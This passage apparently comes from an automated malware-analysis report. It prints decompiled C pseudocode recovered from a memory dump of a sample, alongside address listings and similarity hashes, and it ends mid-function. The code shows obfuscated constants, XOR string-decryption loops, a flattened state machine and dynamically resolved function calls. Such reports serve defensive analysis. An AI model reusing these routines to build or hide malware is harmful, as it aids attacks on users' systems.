                                              0x0022b29f
                                              0x0022b29f
                                              0x0022b29f
                                              0x0022b2a3
                                              0x0022b2b2
                                              0x0022b2b5
                                              0x0022b2b5
                                              0x00000000
                                              0x0022b2b5
                                              0x00000000
                                              0x0022b2a3
                                              0x00000000
                                              0x0022b2b7
                                              0x0022b2b7
                                              0x0022b2b7
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: B$W$
                                              • API String ID: 0-584637061
                                              • Opcode ID: 1f8b9d277b684e02cec951c9d03325fa66af6d15098b8e99b1f989bba8dbe267
                                              • Instruction ID: 3ad10d5a65a7e0da1b9b11e84fffa66bf23f5c36ed63e8a26dbd9b54e2d86b0c
                                              • Opcode Fuzzy Hash: 1f8b9d277b684e02cec951c9d03325fa66af6d15098b8e99b1f989bba8dbe267
                                              • Instruction Fuzzy Hash: 9D419771518312DBD314CF20E58955FBBE1FBC8758F104A1EF4896A1A0D7B48A0ACF83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002331E2, Relevance: 2.6, Strings: 2, Instructions: 102COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E002331E2(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v572;
				intOrPtr* _t106;
				signed int _t110;
				signed int _t111;

				_v52 = 0;
				_v28 = 0x38ff;
				_v28 = _v28 | 0x657975a1;
				_v28 = _v28 ^ 0x65795a60;
				_v36 = 0xb7c2;
				_t110 = 0x62;
				_v36 = _v36 / _t110;
				_v36 = _v36 ^ 0x0000110e;
				_v24 = 0xe00a;
				_v24 = _v24 << 5;
				_v24 = _v24 + 0xffffb393;
				_v24 = _v24 ^ 0x001b9d0d;
				_v20 = 0xfb31;
				_v20 = _v20 + 0xbdbd;
				_v20 = _v20 + 0x1446;
				_v20 = _v20 ^ 0x0001be9a;
				_v40 = 0x7fef;
				_v40 = _v40 >> 1;
				_v40 = _v40 ^ 0x00001ed5;
				_v8 = 0xf1c1;
				_v8 = _v8 << 7;
				_v8 = _v8 + 0x6d97;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0xf29c2a73;
				_v32 = 0xb6f2;
				_v32 = _v32 | 0x667f3c4f;
				_v32 = _v32 ^ 0x667f909f;
				_v16 = 0xa641;
				_t111 = 0x3c;
				_v16 = _v16 / _t111;
				_v16 = _v16 >> 7;
				_v16 = _v16 ^ 0x1e480640;
				_v16 = _v16 ^ 0x1e480386;
				_v44 = 0xa73d;
				_v44 = _v44 >> 0xd;
				_v44 = _v44 ^ 0x000057d1;
				_v48 = 0x6a4b;
				_v48 = _v48 << 7;
				_v48 = _v48 ^ 0x00354ae8;
				_v12 = 0x27be;
				_v12 = _v12 ^ 0xc55dd82d;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0xb51d94d3;
				_v12 = _v12 ^ 0x844acffa;
				_t112 = _v28;
				if(E00221210(_v28, _v36, _t111, _v24,  &_v572, _v20) != 0) {
					_t106 =  &_v572;
					if(_v572 != 0) {
						while( *_t106 != 0x5c) {
							_t106 = _t106 + 2;
							if( *_t106 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						_t112 = 0;
						 *((short*)(_t106 + 2)) = 0;
					}
					L6:
					E0023375D(_v40, _t112, _t112,  &_v572, _v8, _v32, _v16, _t112,  &_v52, _v44, _t112, _v48, _t112, _v12);
				}
				return _v52;
			}



















                                              0x002331f0
                                              0x002331f3
                                              0x002331fa
                                              0x00233201
                                              0x00233208
                                              0x00233214
                                              0x00233219
                                              0x0023321e
                                              0x00233225
                                              0x0023322c
                                              0x00233230
                                              0x00233237
                                              0x0023323e
                                              0x00233245
                                              0x0023324c
                                              0x00233253
                                              0x0023325a
                                              0x00233261
                                              0x00233264
                                              0x0023326b
                                              0x00233272
                                              0x00233276
                                              0x0023327d
                                              0x00233281
                                              0x00233288
                                              0x0023328f
                                              0x00233296
                                              0x0023329d
                                              0x002332a7
                                              0x002332aa
                                              0x002332b3
                                              0x002332b7
                                              0x002332be
                                              0x002332c5
                                              0x002332cc
                                              0x002332d0
                                              0x002332d7
                                              0x002332de
                                              0x002332e2
                                              0x002332e9
                                              0x002332f0
                                              0x002332f7
                                              0x002332fb
                                              0x00233302
                                              0x00233314
                                              0x00233321
                                              0x00233323
                                              0x00233330
                                              0x00233332
                                              0x00233338
                                              0x0023333e
                                              0x00000000
                                              0x00000000
                                              0x00233340
                                              0x00000000
                                              0x0023333e
                                              0x00233342
                                              0x00233344
                                              0x00233344
                                              0x00233348
                                              0x0023336d
                                              0x00233372
                                              0x0023337c

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: `Zye$J5
                                              • API String ID: 0-1569392922
                                              • Opcode ID: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
                                              • Instruction ID: 3a9bc95902d7a869886f25d0ac34489c5f39069b06a243add85ba26fa5583d9a
                                              • Opcode Fuzzy Hash: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
                                              • Instruction Fuzzy Hash: D34102B1D1021DEBEF59CFA0C94A9EEBBB5FB14304F108199E111B62A0D7B94B54CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0023889D, Relevance: 2.6, Strings: 2, Instructions: 101COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 94%
                                              			E0023889D(signed int* __ecx, void* __edx, void* __eflags) {
				void* _t50;
				signed int _t57;
				signed int _t74;
				signed int _t75;
				signed int _t84;
				unsigned int _t85;
				unsigned int _t86;
				signed int _t93;
				signed int _t94;
				signed int* _t95;
				signed int* _t96;
				signed int _t97;
				signed int _t98;
				unsigned int _t100;
				void* _t106;
				short _t107;
				void* _t108;
				void* _t109;

				_push( *((intOrPtr*)(_t108 + 0x30)));
				_push(__ecx);
				E0022602B(_t50);
				 *((intOrPtr*)(_t108 + 0x30)) = 0x3e4ab4;
				_t95 =  &(__ecx[1]);
				_t107 = 0;
				 *((intOrPtr*)(_t108 + 0x34)) = 0;
				 *(_t108 + 0x24) = 0xc5f8;
				 *(_t108 + 0x24) =  *(_t108 + 0x24) + 0x6051;
				 *(_t108 + 0x24) =  *(_t108 + 0x24) ^ 0x00010c1f;
				 *(_t108 + 0x1c) = 0x21c8;
				_t97 = 0x48;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) / _t97;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) + 0xffffac68;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) ^ 0xffffa2cd;
				 *(_t108 + 0x20) = 0xf93e;
				_t98 = 0xe;
				 *(_t108 + 0x20) =  *(_t108 + 0x20) / _t98;
				 *(_t108 + 0x20) =  *(_t108 + 0x20) ^ 0x00004b7b;
				_t93 =  *__ecx;
				_t96 =  &(_t95[1]);
				_t57 =  *_t95 ^ _t93;
				 *(_t108 + 0x28) = _t93;
				 *(_t108 + 0x2c) = _t57;
				_t32 = _t57 + 1; // 0xf93f
				_t100 =  !=  ? (_t32 & 0xfffffffc) + 4 : _t32;
				_t109 = _t108 + 4;
				_t74 = E00228736(_t100 + _t100);
				 *(_t109 + 0x20) = _t74;
				if(_t74 != 0) {
					_t94 = _t74;
					_t106 =  >  ? 0 :  &(_t96[_t100 >> 2]) - _t96 + 3 >> 2;
					if(_t106 != 0) {
						_t75 =  *(_t109 + 0x1c);
						do {
							_t84 =  *_t96;
							_t96 =  &(_t96[1]);
							_t85 = _t84 ^ _t75;
							 *_t94 = _t85 & 0x000000ff;
							_t94 = _t94 + 8;
							 *((short*)(_t94 - 6)) = _t85 >> 0x00000008 & 0x000000ff;
							_t86 = _t85 >> 0x10;
							_t107 = _t107 + 1;
							 *((short*)(_t94 - 4)) = _t86 & 0x000000ff;
							 *((short*)(_t94 - 2)) = _t86 >> 0x00000008 & 0x000000ff;
						} while (_t107 < _t106);
						_t74 =  *(_t109 + 0x18);
					}
					 *((short*)(_t74 +  *(_t109 + 0x20) * 2)) = 0;
				}
				return _t74;
			}





















                                              0x002388a4
                                              0x002388a9
                                              0x002388aa
                                              0x002388af
                                              0x002388b7
                                              0x002388ba
                                              0x002388be
                                              0x002388c2
                                              0x002388ca
                                              0x002388d2
                                              0x002388da
                                              0x002388e8
                                              0x002388ed
                                              0x002388f1
                                              0x002388f9
                                              0x00238901
                                              0x0023890f
                                              0x00238912
                                              0x00238916
                                              0x0023891e
                                              0x00238922
                                              0x00238925
                                              0x00238927
                                              0x0023892b
                                              0x0023892f
                                              0x0023893f
                                              0x0023894a
                                              0x00238959
                                              0x0023895b
                                              0x00238963
                                              0x0023896a
                                              0x0023897b
                                              0x00238980
                                              0x00238982
                                              0x00238986
                                              0x00238986
                                              0x00238988
                                              0x0023898b
                                              0x00238990
                                              0x00238998
                                              0x0023899e
                                              0x002389a2
                                              0x002389ab
                                              0x002389ac
                                              0x002389b3
                                              0x002389b7
                                              0x002389bb
                                              0x002389bb
                                              0x002389c5
                                              0x002389c5
                                              0x002389d2

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: Q`${K
                                              • API String ID: 0-3942002812
                                              • Opcode ID: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
                                              • Instruction ID: 546dd2d13ef3ce2030544e553c9bc014a641e38ca35e861f266fbf33ef99f51b
                                              • Opcode Fuzzy Hash: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
                                              • Instruction Fuzzy Hash: 8F31BD726087128FD314DF29C48456BF7E0FF88318F414A2DF4899B250D774E90A8B86
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0023878F, Relevance: 2.6, Strings: 2, Instructions: 86COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 91%
                                              			E0023878F(void* __ecx, void* __edx, void* __eflags) {
				signed int* _t40;
				signed int _t42;
				unsigned int* _t55;
				signed int _t56;
				signed int _t58;
				signed int _t65;
				unsigned int _t66;
				unsigned int _t67;
				unsigned int* _t70;
				signed int* _t71;
				signed int* _t72;
				unsigned int _t74;
				void* _t80;
				void* _t82;
				void* _t84;
				void* _t85;

				_push( *((intOrPtr*)(_t84 + 0x18)));
				_push( *(_t84 + 0x24));
				_push(__ecx);
				_t40 = E0022602B( *((intOrPtr*)(_t84 + 0x18)));
				 *(_t84 + 0x34) = 0x2399;
				_t4 =  &(_t40[1]); // 0x4
				_t71 = _t4;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbd3b6;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) + 0xfffffbe3;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbb717;
				 *(_t84 + 0x20) = 0xf668;
				 *(_t84 + 0x20) =  *(_t84 + 0x20) | 0x7255987b;
				 *(_t84 + 0x20) =  *(_t84 + 0x20) ^ 0x7255e635;
				 *(_t84 + 0x1c) = 0x6aea;
				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) + 0xffff3e88;
				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) ^ 0xffff96c8;
				_t58 =  *_t40;
				_t72 =  &(_t71[1]);
				_t42 =  *_t71 ^ _t58;
				 *(_t84 + 0x24) = _t58;
				 *(_t84 + 0x28) = _t42;
				_t23 = _t42 + 1; // 0x1
				_t74 =  !=  ? (_t23 & 0xfffffffc) + 4 : _t23;
				_t85 = _t84 + 8;
				_t55 = E00228736(_t74);
				 *(_t85 + 0x2c) = _t55;
				if(_t55 != 0) {
					_t82 = 0;
					_t70 = _t55;
					_t80 =  >  ? 0 :  &(_t72[_t74 >> 2]) - _t72 + 3 >> 2;
					if(_t80 != 0) {
						_t56 =  *(_t85 + 0x18);
						do {
							_t65 =  *_t72;
							_t72 =  &(_t72[1]);
							_t66 = _t65 ^ _t56;
							 *_t70 = _t66;
							_t70 =  &(_t70[1]);
							_t67 = _t66 >> 0x10;
							 *((char*)(_t70 - 3)) = _t66 >> 8;
							 *(_t70 - 2) = _t67;
							_t82 = _t82 + 1;
							 *((char*)(_t70 - 1)) = _t67 >> 8;
						} while (_t82 < _t80);
						_t55 =  *(_t85 + 0x28);
					}
					 *((char*)(_t55 +  *((intOrPtr*)(_t85 + 0x1c)))) = 0;
				}
				return _t55;
			}



















                                              0x00238799
                                              0x0023879a
                                              0x0023879f
                                              0x002387a0
                                              0x002387a5
                                              0x002387ad
                                              0x002387ad
                                              0x002387b0
                                              0x002387b8
                                              0x002387c0
                                              0x002387c8
                                              0x002387d0
                                              0x002387d8
                                              0x002387e0
                                              0x002387e8
                                              0x002387f0
                                              0x002387f8
                                              0x002387fc
                                              0x002387ff
                                              0x00238801
                                              0x00238805
                                              0x00238809
                                              0x00238819
                                              0x00238824
                                              0x00238832
                                              0x00238834
                                              0x0023883c
                                              0x00238844
                                              0x00238846
                                              0x00238857
                                              0x0023885c
                                              0x0023885e
                                              0x00238862
                                              0x00238862
                                              0x00238864
                                              0x00238867
                                              0x00238869
                                              0x00238870
                                              0x00238873
                                              0x00238876
                                              0x00238879
                                              0x0023887f
                                              0x00238880
                                              0x00238883
                                              0x00238887
                                              0x00238887
                                              0x00238890
                                              0x00238890
                                              0x0023889c

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 5Ur$j
                                              • API String ID: 0-2435424154
                                              • Opcode ID: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
                                              • Instruction ID: 9e9f38894ceeb8edc4e840745788ab0e68a0a794c28436a77a4f9153a5d52da2
                                              • Opcode Fuzzy Hash: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
                                              • Instruction Fuzzy Hash: 1C318C72A093118FD314CF29C88545BFBE0EF98714F454B5DF989AB251D734EA0ACB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00239586, Relevance: 2.6, Strings: 2, Instructions: 79COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 64%
                                              			E00239586(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _t78;
				void* _t80;
				intOrPtr* _t81;
				intOrPtr _t95;

				_v40 = _v40 & 0x00000000;
				_v44 = 0x5b9444;
				_v12 = 0xdcba;
				_v12 = _v12 >> 4;
				_v12 = _v12 >> 4;
				_v12 = _v12 + 0x949;
				_v12 = _v12 ^ 0x00001af4;
				_v8 = 0x3cb;
				_v8 = _v8 + 0xffff192d;
				_v8 = _v8 + 0x1519;
				_v8 = _v8 ^ 0xffff4a83;
				_v20 = 0x60da;
				_v20 = _v20 >> 4;
				_t95 = _a4;
				_v20 = _v20 * 0x71;
				_v20 = _v20 ^ 0x0002f52e;
				_v24 = 0x45f5;
				_v24 = _v24 ^ 0x8ddfc3a3;
				_v24 = _v24 | 0x63507c9c;
				_v24 = _v24 ^ 0xefdfb5dc;
				_v32 = 0xfa49;
				_v32 = _v32 ^ 0xb8265659;
				_v32 = _v32 ^ 0xb826ab18;
				_v28 = 0xa34;
				_v28 = _v28 | 0x478cb459;
				_v28 = _v28 ^ 0x0d1ea304;
				_v28 = _v28 ^ 0x4a9200da;
				_v36 = 0x43f7;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 ^ 0x00001d3e;
				_v16 = 0x9c5f;
				_v16 = _v16 * 0x1d;
				_v16 = _v16 * 0x2e;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x65dacbc4;
				_t78 =  *((intOrPtr*)(_t95 + 4))( *((intOrPtr*)(_t95 + 0x28)), 1, 0);
				_t98 = _t78;
				if(_t78 != 0) {
					_push(0x23c860);
					_push(_v20);
					_t80 = E0023878F(_v12, _v8, _t98);
					_push(_v32);
					_t93 = _t80;
					_push(_v24);
					_t81 = E00236965(_t80,  *((intOrPtr*)(_t95 + 0x28)));
					if(_t81 != 0) {
						 *_t81();
					}
					E00232025(_v28, _t93, _v36, _v16);
				}
				return 0;
			}

















                                              0x0023958c
                                              0x00239590
                                              0x00239597
                                              0x0023959e
                                              0x002395a2
                                              0x002395a6
                                              0x002395ad
                                              0x002395b4
                                              0x002395bb
                                              0x002395c2
                                              0x002395cf
                                              0x002395d6
                                              0x002395dd
                                              0x002395e6
                                              0x002395ed
                                              0x002395f0
                                              0x002395f7
                                              0x002395fe
                                              0x00239605
                                              0x0023960c
                                              0x00239613
                                              0x0023961a
                                              0x00239621
                                              0x00239628
                                              0x0023962f
                                              0x00239636
                                              0x0023963d
                                              0x00239644
                                              0x0023964b
                                              0x0023964f
                                              0x00239656
                                              0x00239661
                                              0x00239668
                                              0x0023966b
                                              0x0023966f
                                              0x00239679
                                              0x0023967c
                                              0x0023967e
                                              0x00239681
                                              0x00239686
                                              0x0023968f
                                              0x00239694
                                              0x00239697
                                              0x00239699
                                              0x002396a1
                                              0x002396ab
                                              0x002396ad
                                              0x002396ad
                                              0x002396ba
                                              0x002396c1
                                              0x002396c8

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 4$I
                                              • API String ID: 0-2585635819
                                              • Opcode ID: 011bc5a7186ddba618edd6868eadf305873c4fe7a9155033514f5113551c3624
                                              • Instruction ID: 0583ec25c6ece0fc6139c0fc6886ddc7cf5ee30f61b0c1f366b3aaff3c626044
                                              • Opcode Fuzzy Hash: 011bc5a7186ddba618edd6868eadf305873c4fe7a9155033514f5113551c3624
                                              • Instruction Fuzzy Hash: A04112B1D0030AABEF04DFA1C94A6EEBBB5FB44314F208159D411B6290D3B99B55CF95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00227998, Relevance: 2.6, Strings: 2, Instructions: 74COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 90%
                                              			E00227998(void* __ecx, void* __edx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t74;
				intOrPtr _t83;
				signed int _t85;
				signed int _t86;
				signed int _t96;
				intOrPtr* _t97;

				_t97 = _a4;
				_push(_a12);
				_t96 = _a8;
				_push(_t96);
				_push(_t97);
				E0022602B(_t74);
				_v24 = 0x43bd;
				_v24 = _v24 >> 0xe;
				_v24 = _v24 ^ 0x00002257;
				_v20 = 0xfb35;
				_v20 = _v20 ^ 0x316dcd7c;
				_v20 = _v20 ^ 0x316d5b09;
				_v8 = 0x86ca;
				_t85 = 0x26;
				_v8 = _v8 / _t85;
				_v8 = _v8 + 0xffffb56c;
				_v8 = _v8 ^ 0xffffa5a2;
				_a4 = 0x6ea8;
				_a4 = _a4 | 0xeb58ef4a;
				_a4 = _a4 << 6;
				_t86 = 0x7d;
				_a4 = _a4 / _t86;
				_a4 = _a4 ^ 0x01b6ec6f;
				_v16 = 0xf7ce;
				_v16 = _v16 + 0xffffb713;
				_v16 = _v16 + 0xe2af;
				_v16 = _v16 ^ 0x0001a1e1;
				_v12 = 0x7f90;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x9419cfce;
				_v12 = _v12 ^ 0x9419fbb9;
				_a8 = 0xab6f;
				_a8 = _a8 * 0x2a;
				_a8 = _a8 >> 0xf;
				_a8 = _a8 | 0x38dd753e;
				_a8 = _a8 ^ 0x38dd1846;
				E0023360F(_t96, _v24, _v20,  *((intOrPtr*)(_t97 + 4)), _v8);
				E00232674(_a4, _v16,  *((intOrPtr*)(_t97 + 4)),  *((intOrPtr*)(_t96 + 0x34)), _v12, _a8,  *_t97);
				_t83 =  *((intOrPtr*)(_t97 + 4));
				 *((intOrPtr*)(_t96 + 0x34)) =  *((intOrPtr*)(_t96 + 0x34)) + _t83;
				return _t83;
			}














                                              0x0022799f
                                              0x002279a3
                                              0x002279a6
                                              0x002279a9
                                              0x002279aa
                                              0x002279ad
                                              0x002279b2
                                              0x002279bb
                                              0x002279bf
                                              0x002279c6
                                              0x002279cd
                                              0x002279d4
                                              0x002279db
                                              0x002279e7
                                              0x002279ec
                                              0x002279f1
                                              0x002279f8
                                              0x002279ff
                                              0x00227a06
                                              0x00227a0d
                                              0x00227a14
                                              0x00227a19
                                              0x00227a1c
                                              0x00227a23
                                              0x00227a2a
                                              0x00227a31
                                              0x00227a38
                                              0x00227a3f
                                              0x00227a46
                                              0x00227a4a
                                              0x00227a51
                                              0x00227a58
                                              0x00227a63
                                              0x00227a66
                                              0x00227a6a
                                              0x00227a71
                                              0x00227a84
                                              0x00227a9d
                                              0x00227aa2
                                              0x00227aa8
                                              0x00227ab0

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: [m1$JX
                                              • API String ID: 0-848362422
                                              • Opcode ID: 753b8a0fce25be50dec76d604cb7334f1ed1f8c12209d0cf9d880ad97dc86ea5
                                              • Instruction ID: 20be8939a2cdba0078a10cf26d6be4460f51e9350a3b940a532600abc45c3f72
                                              • Opcode Fuzzy Hash: 753b8a0fce25be50dec76d604cb7334f1ed1f8c12209d0cf9d880ad97dc86ea5
                                              • Instruction Fuzzy Hash: C8310476900209FFCF58CFA5D94A89EBBB5FF44314F20C059E9196A260D3799B24DF80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00229A37, Relevance: 1.6, Strings: 1, Instructions: 320COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 97%
                                              			E00229A37(void* __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				char _v196;
				void* _t297;
				signed int _t335;
				signed int* _t340;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				char* _t354;
				void* _t380;
				void* _t381;
				void* _t382;
				void* _t383;
				void* _t386;

				_push(_a8);
				_t340 = __edx;
				_t380 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t297);
				_v24 = 0xc44;
				_t383 = _t382 + 0x10;
				_v24 = _v24 << 2;
				_v24 = _v24 << 5;
				_t381 = 0x108b8bb2;
				_v24 = _v24 >> 1;
				_v24 = _v24 ^ 0x0003068b;
				_v96 = 0x3b9e;
				_v96 = _v96 ^ 0x893884c8;
				_v96 = _v96 ^ 0x89388972;
				_v48 = 0x8b0e;
				_v48 = _v48 << 6;
				_v48 = _v48 + 0xffffd606;
				_t342 = 0x6d;
				_v48 = _v48 * 0x69;
				_v48 = _v48 ^ 0x0e30afa5;
				_v76 = 0xbb1c;
				_v76 = _v76 + 0xffff2a80;
				_v76 = _v76 | 0x384e25df;
				_v76 = _v76 ^ 0xffffbccb;
				_v68 = 0x817b;
				_v68 = _v68 + 0xb36b;
				_v68 = _v68 * 0x62;
				_v68 = _v68 ^ 0x00761722;
				_v112 = 0x78f7;
				_v112 = _v112 + 0xabd9;
				_v112 = _v112 ^ 0x00010bcc;
				_v64 = 0xef7a;
				_v64 = _v64 * 0x6b;
				_v64 = _v64 >> 6;
				_v64 = _v64 ^ 0x0001bb5c;
				_v104 = 0x32c;
				_v104 = _v104 << 5;
				_v104 = _v104 ^ 0x00002d3d;
				_v52 = 0x7426;
				_v52 = _v52 * 0x5d;
				_v52 = _v52 ^ 0xa80e6da6;
				_v52 = _v52 / _t342;
				_v52 = _v52 ^ 0x018aaa04;
				_v12 = 0xd0fb;
				_t343 = 0x6a;
				_v12 = _v12 / _t343;
				_v12 = _v12 + 0xffff7920;
				_v12 = _v12 + 0xffff83ce;
				_v12 = _v12 ^ 0xfffec2a6;
				_v108 = 0xe89;
				_v108 = _v108 + 0x85a8;
				_v108 = _v108 ^ 0x0000adac;
				_v92 = 0xd004;
				_v92 = _v92 + 0xffff90ab;
				_v92 = _v92 | 0x2bfbb4c5;
				_v92 = _v92 ^ 0x2bfba16d;
				_v8 = 0x51d1;
				_v8 = _v8 ^ 0x91ec542a;
				_v8 = _v8 | 0xbd5d6296;
				_v8 = _v8 + 0xe80e;
				_v8 = _v8 ^ 0xbdfe1041;
				_v40 = 0xc5fc;
				_v40 = _v40 | 0x331e7523;
				_v40 = _v40 + 0xc476;
				_v40 = _v40 | 0xe5b13554;
				_v40 = _v40 ^ 0xf7bfa45a;
				_v116 = 0x6d98;
				_v116 = _v116 >> 0xf;
				_v116 = _v116 ^ 0x000044aa;
				_v88 = 0x7357;
				_v88 = _v88 + 0x7cff;
				_t344 = 0x6e;
				_v88 = _v88 * 0x25;
				_v88 = _v88 ^ 0x0022e11b;
				_v56 = 0x39e0;
				_v56 = _v56 + 0xffffb0fb;
				_v56 = _v56 << 6;
				_v56 = _v56 ^ 0xfffab6b2;
				_v44 = 0x2257;
				_v44 = _v44 / _t344;
				_v44 = _v44 + 0x17fe;
				_v44 = _v44 + 0xffff4b8e;
				_v44 = _v44 ^ 0xffff3a3c;
				_v16 = 0xac11;
				_t345 = 0xd;
				_v16 = _v16 / _t345;
				_t346 = 0x22;
				_v16 = _v16 / _t346;
				_v16 = _v16 + 0xffff8051;
				_v16 = _v16 ^ 0xffffec84;
				_v32 = 0x207e;
				_v32 = _v32 + 0xffff85d9;
				_v32 = _v32 | 0x92dc0f10;
				_t347 = 0x3d;
				_v32 = _v32 * 0x4f;
				_v32 = _v32 ^ 0xffe76a4a;
				_v72 = 0xf5a4;
				_v72 = _v72 << 9;
				_v72 = _v72 + 0x6505;
				_v72 = _v72 ^ 0x01ebcff4;
				_v124 = 0xf81;
				_v124 = _v124 + 0x174a;
				_v124 = _v124 ^ 0x00005562;
				_v80 = 0xd566;
				_v80 = _v80 << 0xd;
				_v80 = _v80 << 0xa;
				_v80 = _v80 ^ 0xb30025af;
				_v20 = 0xd4e9;
				_v20 = _v20 ^ 0x0ea0d6e7;
				_v20 = _v20 / _t347;
				_v20 = _v20 | 0xf8279f10;
				_v20 = _v20 ^ 0xf83fc9b3;
				_v100 = 0xda9a;
				_v100 = _v100 * 3;
				_v100 = _v100 ^ 0x0002f5f9;
				_v36 = 0x78aa;
				_v36 = _v36 + 0x4117;
				_v36 = _v36 >> 0xa;
				_v36 = _v36 | 0x25804fa7;
				_v36 = _v36 ^ 0x25803510;
				_v28 = 0x20d5;
				_v28 = _v28 + 0xfab3;
				_v28 = _v28 | 0xa4f7c20c;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x149e8671;
				_v60 = 0x9445;
				_v60 = _v60 | 0xc2ce9f5c;
				_v60 = _v60 ^ 0x46e2878d;
				_v60 = _v60 ^ 0x842c5375;
				_v120 = 0x3512;
				_v120 = _v120 << 9;
				_v120 = _v120 ^ 0x006a5627;
				_v84 = 0xeb51;
				_v84 = _v84 * 0x42;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 ^ 0x000027de;
				goto L1;
				do {
					while(1) {
						L1:
						_t386 = _t381 - 0x1e9793a2;
						if(_t386 > 0) {
							break;
						}
						if(_t386 == 0) {
							E00227998(_v100, _v36, __eflags, _t380 + 0x20,  &_v196, _v28);
							_t383 = _t383 + 0xc;
							_t381 = 0x39ecd3df;
							continue;
						} else {
							if(_t381 == 0xaa31e0c) {
